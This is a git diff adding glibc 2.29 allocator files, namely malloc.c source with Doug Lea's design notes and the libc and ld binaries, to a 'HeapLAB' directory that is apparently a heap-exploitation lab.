+      if (value > 0)
+	do_set_arena_test (value);
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+	do_set_arena_max (value);
+      break;
+    }
+  __libc_lock_unlock (av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
+
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM,
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+ * ptr = 0;
+      }
+   }
+
+ */
+
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (const char *str)
+{
+  __libc_message (do_abort, "%s\n", str);
+  __builtin_unreachable ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the SIZE argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
+
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      __libc_lock_lock (ar_ptr->mutex);
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		size_t r_size = chunksize_nomask (r);
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r_size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r_size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r_size);
+
+		r = r->fd;
+	      }
+
+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      size_t heap_size = 0;
+      size_t heap_mprotect_size = 0;
+      size_t heap_count = 0;
+      if (ar_ptr != &main_arena)
+	{
+	  /* Iterate over the arena heaps from back to front.  */
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  do
+	    {
+	      heap_size += heap->size;
+	      heap_mprotect_size += heap->mprotect_size;
+	      heap = heap->prev;
+	      ++heap_count;
+	    }
+	  while (heap != NULL);
+	}
+
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
+	if (sizes[i].count != 0 && i != NFASTBINS)
+	  fprintf (fp, "							      \
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+		   "<aspace type=\"subheaps\" size=\"%zu\"/>\n",
+		   heap_size, heap_mprotect_size, heap_count);
+	  total_aspace += heap_size;
+	  total_aspace_mprotect += heap_mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
+
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_26)
+compat_symbol (libc, __libc_free, cfree, GLIBC_2_0);
+#endif
+
+/* ------------------------------------------------------------
+   History:
+
+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.glibc/glibc_2.29/ld-2.29.so b/HeapLAB/.glibc/glibc_2.29/ld-2.29.so
new file mode 100755
index 0000000..71e5893
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.29/ld-2.29.so differ
diff --git a/HeapLAB/.glibc/glibc_2.29/ld.so.2 b/HeapLAB/.glibc/glibc_2.29/ld.so.2
new file mode 120000
index 0000000..1b67396
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.29/ld.so.2
@@ -0,0 +1 @@
+ld-2.29.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.29/libc-2.29.so b/HeapLAB/.glibc/glibc_2.29/libc-2.29.so
new file mode 100755
index 0000000..627a125
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.29/libc-2.29.so differ
diff --git a/HeapLAB/.glibc/glibc_2.29/libc.so.6 b/HeapLAB/.glibc/glibc_2.29/libc.so.6
new file mode 120000
index 0000000..89bb464
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.29/libc.so.6
@@ -0,0 +1 @@
+libc-2.29.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.29/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.29/malloc/malloc.c
new file mode 100644
index 0000000..feaf7ee
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.29/malloc/malloc.c
@@ -0,0 +1,5609 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2019 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <http://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However it is among the fastest
+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator, that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  You may already by default be using a C library containing a malloc
+  that is  based on some version of this malloc (for example in
+  linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8 byte alignment with 4byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+			  8-byte ptrs:  24/32 bytes (including, 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
+       The maximum overhead wastage (i.e., number of extra bytes
+       allocated than were requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may also
+       also fail because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification
+       Also SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+#include <assert.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et. al.  */
+#include <libc-pointer-arith.h>
+
+/* For DIAG_PUSH/POP_NEEDS_COMMENT et al.  */
+#include <libc-diag.h>
+
+#include <malloc/malloc-internal.h>
+
+/* For SINGLE_THREAD_P.  */
+#include <sysdep-cancel.h>
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summmaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
+#define MALLOC_DEBUG 0
+#endif
+
+#ifndef NDEBUG
+# define __assert_fail(assertion, file, line, function)			\
+	 __malloc_assert(assertion, file, line, function)
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+#if USE_TCACHE
+/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
+# define TCACHE_MAX_BINS		64
+# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)
+
+/* Only used to pre-fill the tunables.  */
+# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
+
+/* When "x" is from chunksize().  */
+# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
+/* When "x" is a user-provided size.  */
+# define usize2tidx(x) csize2tidx (request2size (x))
+
+/* With rounding and alignment, the bins are...
+   idx 0   bytes 0..24 (64-bit) or 0..12 (32-bit)
+   idx 1   bytes 25..40 or 13..20
+   idx 2   bytes 41..56 or 21..28
+   etc.  */
+
+/* This is another arbitrary limit, which tunables can change.  Each
+   tcache bin will hold at most this number of chunks.  */
+# define TCACHE_FILL_COUNT 7
+#endif
+
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, since this malloc
+  returns a unique pointer for malloc(0), so does realloc(p, 0).
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
+  TRIM_FASTBINS is an in-between compile-time option, that disables
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macos.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+/* We may need to support __malloc_initialize_hook for backwards
+   compatibility.  */
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_24)
+# define HAVE_MALLOC_INIT_HOOK 1
+#else
+# define HAVE_MALLOC_INIT_HOOK 0
+#endif
+
+
+/*
+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG malloinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minumum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
